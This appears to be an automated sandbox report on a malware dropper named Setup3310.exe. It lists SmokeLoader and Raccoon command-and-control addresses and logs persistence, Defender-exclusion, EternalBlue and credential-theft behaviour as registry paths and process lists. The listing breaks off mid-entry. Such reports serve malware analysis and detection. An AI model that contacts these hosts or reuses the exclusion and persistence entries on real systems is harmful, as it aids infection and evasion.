Resubmissions
18-03-2021 16:36
210318-gp18cmknhn 1018-03-2021 16:36
210318-c2gfjesvja 1018-03-2021 16:36
210318-vqkv89gzv2 1018-03-2021 16:36
210318-hkbpmljzte 1018-03-2021 16:36
210318-x2ph225zjs 1018-03-2021 16:04
210318-a66favrxcs 10Analysis
-
max time kernel
1765s -
max time network
1802s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
18-03-2021 16:36
Static task
static1
Behavioral task
behavioral1
Sample
Setup3310.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Setup3310.exe
Resource
win7v20201028
General
-
Target
Setup3310.exe
-
Size
381KB
-
MD5
acf61459d6319724ab22cb5a8308d429
-
SHA1
8a5d782e6f31c3005e5e0706a3d266ece492a6cf
-
SHA256
344d7b46385722db4733eee860283c00327c85f28dd76acc996be63f4c4c956e
-
SHA512
d5f38cb8ed500510ba7d466345c854856ec70121683d4b5398651bfd41a7f5f8d754e8fece0bca38e334214d326afa1970b19e79c3d8507bff9d7782df762877
Malware Config
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
metasploit
windows/single_exec
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/8200-347-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral2/memory/8200-348-0x0000000004F40000-0x000000000579D000-memory.dmp family_glupteba behavioral2/memory/8200-349-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Modifies boot configuration data using bcdedit 14 IoCs
pid Process 6040 bcdedit.exe 6128 bcdedit.exe 6164 bcdedit.exe 6192 bcdedit.exe 6220 bcdedit.exe 6256 bcdedit.exe 6280 bcdedit.exe 6304 bcdedit.exe 6328 bcdedit.exe 6380 bcdedit.exe 6408 bcdedit.exe 6428 bcdedit.exe 6464 bcdedit.exe 6580 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 287 7308 rundll32.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts HGT.exe File created C:\Windows\system32\drivers\Winmon.sys csrss.exe -
Executes dropped EXE 64 IoCs
pid Process 1312 Setup3310.tmp 564 Setup.exe 524 Setup.tmp 1448 Delta.exe 1692 Delta.tmp 440 Setup.exe 996 PictureLAb.exe 1136 PictureLAb.tmp 880 Setup.exe 620 Setup.tmp 1248 HGT.exe 1584 prolab.exe 976 Paekygibina.exe 1612 prolab.tmp 2496 hjjgaa.exe 2528 jfiag3g_gg.exe 3712 gaooo.exe 3828 jfiag3g_gg.exe 4064 jfiag3g_gg.exe 4736 jfiag3g_gg.exe 6156 md7_7dfj.exe 8088 askinstall29.exe 5532 customer4.exe 5636 main.exe 6388 privacytools5.exe 6904 privacytools5.exe 7360 setup.exe 7624 setup.exe 8280 parse.exe 8336 parse.exe 8348 parse.exe 8856 7za.exe 6560 setup.exe 7816 7za.exe 8200 setup.exe 3476 setup.exe 3028 csrss.exe 4228 patch.exe 6636 dsefix.exe 7296 windefender.exe 7472 windefender.exe 3508 DEUmVUN.exe 3452 Pictures Lab.exe 5924 xrAgvZi.exe 7592 jCXSMNj.exe 3392 784B.tmp.exe 7912 8122.tmp.exe 7928 8680.tmp.exe 7916 8D06.tmp.exe 8688 scdvrab 5632 scdvrab 8856 jfiag3g_gg.exe 6532 jfiag3g_gg.exe 9112 Eternalblue-2.2.0.exe 9152 Eternalblue-2.2.0.exe 3248 Doublepulsar-1.3.1.exe 3256 Doublepulsar-1.3.1.exe 3336 Eternalblue-2.2.0.exe 3352 Eternalblue-2.2.0.exe 3516 Doublepulsar-1.3.1.exe 8840 Eternalblue-2.2.0.exe 8928 Eternalblue-2.2.0.exe 7336 Eternalblue-2.2.0.exe 3696 Eternalblue-2.2.0.exe -
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral2/memory/7296-375-0x0000000000400000-0x0000000000897000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Loads dropped DLL 64 IoCs
pid Process 1640 Setup3310.exe 1312 Setup3310.tmp 1312 Setup3310.tmp 1312 Setup3310.tmp 1312 Setup3310.tmp 564 Setup.exe 524 Setup.tmp 524 Setup.tmp 524 Setup.tmp 524 Setup.tmp 1448 Delta.exe 1692 Delta.tmp 1692 Delta.tmp 1692 Delta.tmp 1692 Delta.tmp 440 Setup.exe 440 Setup.exe 440 Setup.exe 524 Setup.tmp 996 PictureLAb.exe 1136 PictureLAb.tmp 1136 PictureLAb.tmp 1136 PictureLAb.tmp 1136 PictureLAb.tmp 880 Setup.exe 620 Setup.tmp 620 Setup.tmp 620 Setup.tmp 620 Setup.tmp 440 Setup.exe 440 Setup.exe 440 Setup.exe 440 Setup.exe 1584 prolab.exe 1612 prolab.tmp 1612 prolab.tmp 1612 prolab.tmp 1612 prolab.tmp 524 Setup.tmp 2496 hjjgaa.exe 2496 hjjgaa.exe 3712 gaooo.exe 3712 gaooo.exe 2496 hjjgaa.exe 2496 hjjgaa.exe 3712 gaooo.exe 3712 gaooo.exe 5532 customer4.exe 5532 customer4.exe 5636 main.exe 6388 privacytools5.exe 6904 privacytools5.exe 7624 setup.exe 7624 setup.exe 7624 setup.exe 5636 main.exe 5636 main.exe 5636 main.exe 5636 main.exe 5636 main.exe 5636 main.exe 8368 Process not Found 8356 Process not Found 8384 Process not Found -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\MistyTree = "0" setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\setup.exe = "0" setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" setup.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\ZHyshadujuzhi.exe\"" HGT.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hjjgaa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gaooo.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\MistyTree = "\"C:\\Windows\\rss\\csrss.exe\"" setup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 22 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 164 checkip.amazonaws.com 1093 checkip.dyndns.org 1332 checkip.amazonaws.com 1740 api.ipify.org 1764 api.ipify.org 88 ip-api.com 46 ipinfo.io 1401 checkip.dyndns.org 1556 checkip.amazonaws.com 1642 api.ipify.org 1663 api.ipify.org 1691 checkip.amazonaws.com 1726 api.ipify.org 2 ipinfo.io 1227 checkip.amazonaws.com 1445 checkip.amazonaws.com 1705 icanhazip.com 1741 api.ipify.org 54 ipinfo.io 1643 api.ipify.org 1860 checkip.amazonaws.com 4 ipinfo.io -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\gpt.ini setup.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol DEUmVUN.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini DEUmVUN.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 8336 parse.exe 8336 parse.exe 8280 parse.exe 8348 parse.exe 8280 parse.exe 8348 parse.exe 8348 parse.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 6388 set thread context of 6904 6388 privacytools5.exe 78 PID 8688 set thread context of 5632 8688 scdvrab 341 PID 3688 set thread context of 3916 3688 scdvrab 400 PID 4376 set thread context of 4396 4376 scdvrab 443 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Picture Lab\is-V67VV.tmp prolab.tmp File created C:\Program Files (x86)\Picture Lab\is-5U9F0.tmp prolab.tmp File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\da\messages.json xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\ml\messages.json xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\pt_BR\messages.json xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\zh_TW\messages.json xrAgvZi.exe File opened for modification C:\Program Files (x86)\Picture Lab\AForge.Math.dll prolab.tmp File created C:\Program Files (x86)\Picture Lab\is-U516H.tmp prolab.tmp File created C:\Program Files (x86)\yjiDqdgnMIE\icon16.ico xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\Kernel.js xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\ta\messages.json xrAgvZi.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\en_US\messages.json xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\nl\messages.json xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\no\messages.json xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\tr\messages.json xrAgvZi.exe File created C:\Program Files (x86)\Frosty-Field\7za.dll setup.exe File opened for modification C:\Program Files (x86)\Picture Lab\DockManager.config Pictures Lab.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\vi\messages.json xrAgvZi.exe File created C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\TYmwRSM.xml xrAgvZi.exe File opened for modification C:\Program Files (x86)\Picture Lab\Pictures Lab.exe prolab.tmp File opened for modification C:\Program Files (x86)\Picture Lab\SourceLibrary.dll prolab.tmp File created C:\Program Files (x86)\Frosty-Field\winamp.exe 7za.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\id\messages.json xrAgvZi.exe File created C:\Program Files (x86)\Picture Lab\is-8GG8B.tmp prolab.tmp File created C:\Program Files (x86)\Frosty-Field\7za.exe setup.exe File opened for modification C:\Program Files (x86)\Frosty-Field\setup.exe setup.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\fi\messages.json xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\sk\messages.json xrAgvZi.exe File created C:\Program Files (x86)\Frosty-Field\7zxa.dll setup.exe File opened for modification C:\Program Files (x86)\Frosty-Field\winamp.exe 7za.exe File created C:\Program Files\Windows Journal\QFEGEPZROF\prolab.exe.config HGT.exe File created C:\Program Files (x86)\Frosty-Field\WinmonProcessMonitor.sys 7za.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\es_419\messages.json xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\lv\messages.json xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\ms\messages.json xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\ro\messages.json xrAgvZi.exe File opened for modification C:\Program Files (x86)\Picture Lab\AForge.dll prolab.tmp File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\am\messages.json xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\tDF90DJ.dll xrAgvZi.exe File created C:\Program Files (x86)\Picture Lab\is-199VD.tmp prolab.tmp File created C:\Program Files (x86)\yjiDqdgnMIE\2pF5Kwp.dll xrAgvZi.exe File created C:\Program Files (x86)\MCoLVEAxuDhpC\LIWceyB.xml xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\sq\messages.json xrAgvZi.exe File created C:\Program Files\Windows Journal\QFEGEPZROF\prolab.exe HGT.exe File opened for modification C:\Program Files (x86)\Picture Lab\unins000.dat prolab.tmp File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\sl\messages.json xrAgvZi.exe File created C:\Program Files (x86)\Frosty-Field\winamp.exe 7za.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\background.html xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\el\messages.json xrAgvZi.exe File created C:\Program Files (x86)\Windows Media Player\ZHyshadujuzhi.exe.config HGT.exe File opened for modification C:\Program Files (x86)\Frosty-Field\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\cs\messages.json xrAgvZi.exe File created C:\Program Files (x86)\Frosty-Field\winamp.7z setup.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\fil\messages.json xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\sr\messages.json xrAgvZi.exe File created C:\Program Files (x86)\Windows Media Player\ZHyshadujuzhi.exe HGT.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\gu\messages.json xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\ru\messages.json xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\th\messages.json xrAgvZi.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\kn\messages.json xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\kVLys0L.dll xrAgvZi.exe File created C:\Program Files (x86)\yjiDqdgnMIE\files\_locales\ca\messages.json xrAgvZi.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\SC_Reader.exe Process not Found File created C:\Windows\Tasks\qTJPyBJZsADsDDd.job schtasks.exe File created C:\Windows\Tasks\hMZOFgVuABkGdcuhk.job schtasks.exe File opened for modification C:\Windows\rss setup.exe File created C:\Windows\rss\csrss.exe setup.exe File opened for modification \??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\sc_reader.exe Process not Found File created C:\Windows\Tasks\cbBtQoNpOByPPTwrn.job schtasks.exe File created C:\Windows\Tasks\bWIRRaDZCpCYZHZEtf.job schtasks.exe File created C:\Windows\windefender.exe csrss.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 8004 7916 WerFault.exe 329 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI privacytools5.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI scdvrab Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI scdvrab Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI scdvrab Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI scdvrab Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI scdvrab Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI scdvrab Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI scdvrab Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI privacytools5.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI privacytools5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI scdvrab Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI scdvrab -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Setup.exe -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4128 schtasks.exe 3568 schtasks.exe 4108 schtasks.exe 6896 schtasks.exe 5388 schtasks.exe 6988 schtasks.exe 7196 schtasks.exe 9000 schtasks.exe 5820 schtasks.exe 6012 schtasks.exe 6948 schtasks.exe 7092 schtasks.exe 7312 schtasks.exe 8448 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2380 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS setup.exe -
GoLang User-Agent 18 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 967 Go-http-client/1.1 HTTP User-Agent header 972 Go-http-client/1.1 HTTP User-Agent header 1060 Go-http-client/1.1 HTTP User-Agent header 1228 Go-http-client/1.1 HTTP User-Agent header 1557 Go-http-client/1.1 HTTP User-Agent header 1117 Go-http-client/1.1 HTTP User-Agent header 1333 Go-http-client/1.1 HTTP User-Agent header 971 Go-http-client/1.1 HTTP User-Agent header 1058 Go-http-client/1.1 HTTP User-Agent header 1399 Go-http-client/1.1 HTTP User-Agent header 1692 Go-http-client/1.1 HTTP User-Agent header 1815 Go-http-client/1.1 HTTP User-Agent header 1861 Go-http-client/1.1 HTTP User-Agent header 969 Go-http-client/1.1 HTTP User-Agent header 1053 Go-http-client/1.1 HTTP User-Agent header 1061 Go-http-client/1.1 HTTP User-Agent header 1081 Go-http-client/1.1 HTTP User-Agent header 1446 Go-http-client/1.1 -
Kills process with taskkill 2 IoCs
pid Process 2188 taskkill.exe 4680 taskkill.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Ofdryfq.exe = "9999" xrAgvZi.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE} xrAgvZi.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Approved Extensions xrAgvZi.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" jCXSMNj.exe Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE} xrAgvZi.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\Policy = "3" xrAgvZi.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION xrAgvZi.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch jCXSMNj.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl xrAgvZi.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppName = "Ofdryfq.exe" xrAgvZi.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppPath = "C:\\Program Files (x86)\\yjiDqdgnMIE" xrAgvZi.exe Set value (data) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{B7993E1A-469D-4CED-8208-B2E0791F4668} = 51667a6c4c1d3b1b0a2383acaf1581049a05f6a07b590176 xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppName = "Ofdryfq.exe" xrAgvZi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppPath = "C:\\Program Files (x86)\\yjiDqdgnMIE" xrAgvZi.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MAIN xrAgvZi.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\Policy = "3" xrAgvZi.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION xrAgvZi.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Low Rights xrAgvZi.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy xrAgvZi.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" setup.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" setup.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = c0c78bde141cd701 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-362 = "GTB Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C88B0D75-95D7-40B2-89BD-4A3AD4DC11FD} rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" setup.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (str) 